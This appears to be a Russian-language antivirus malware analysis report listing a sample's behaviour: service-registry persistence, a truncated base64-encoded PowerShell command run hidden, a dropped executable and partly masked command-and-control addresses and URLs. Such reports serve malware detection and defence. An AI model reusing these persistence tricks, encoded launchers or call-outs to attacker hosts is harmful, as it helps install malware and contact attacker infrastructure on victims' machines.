Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\NlsData004a] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\NlsData004a] 'ImagePath' = '"<SYSTEM32>\amxread\NlsData004a.exe"'
- 'NlsData004a' "<SYSTEM32>\amxread\NlsData004a.exe"
- 'NlsData004a' <SYSTEM32>\amxread\NlsData004a.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABBADYAbgBqAHEAdAA0AD0AKAAnAFQAbQAnACsAKAAnAGcAJwArACcANgBlACcAKQArACcAdQBoACcAKQA7AC4AKAAnAG4AZQB3ACcAKwAnAC0AaQB0AGUAbQAnACkAIAAkAGUATgB2ADoAVABlAE0AcABcAHcATwBSAEQAXAAyADAAMQA5AFwAIAAtAG...
- %TEMP%\word\2019\t6l_wggw8.exe
- <SYSTEM32>\amxread\nlsdata004a.exe
- %TEMP%\word\2019\t6l_wggw8.exe в <SYSTEM32>\amxread\nlsdata004a.exe
- '21#.#0.40.16':80
- '91.##1.54.71':8080
- http://ka####i-hermes.com/cgi-bin/8/
- http://91.###.54.71:8080/l1Y1dLcSWQk1i9j/b1YwyC6YRU/cJqmSHN/34jdATYm8Omk4a/ via 91.##1.54.71
- DNS ASK ka####i-hermes.com
- '%TEMP%\word\2019\t6l_wggw8.exe'
- '<SYSTEM32>\amxread\nlsdata004a.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABBADYAbgBqAHEAdAA0AD0AKAAnAFQAbQAnACsAKAAnAGcAJwArACcANgBlACcAKQArACcAdQBoACcAKQA7AC4AKAAnAG4AZQB3ACcAKwAnAC0AaQB0AGUAbQAnACkAIAAkAGUATgB2ADoAVABlAE0AcABcAHcATwBSAEQAXAAyADAAMQA5AFwAIAAtAG...' (со скрытым окном)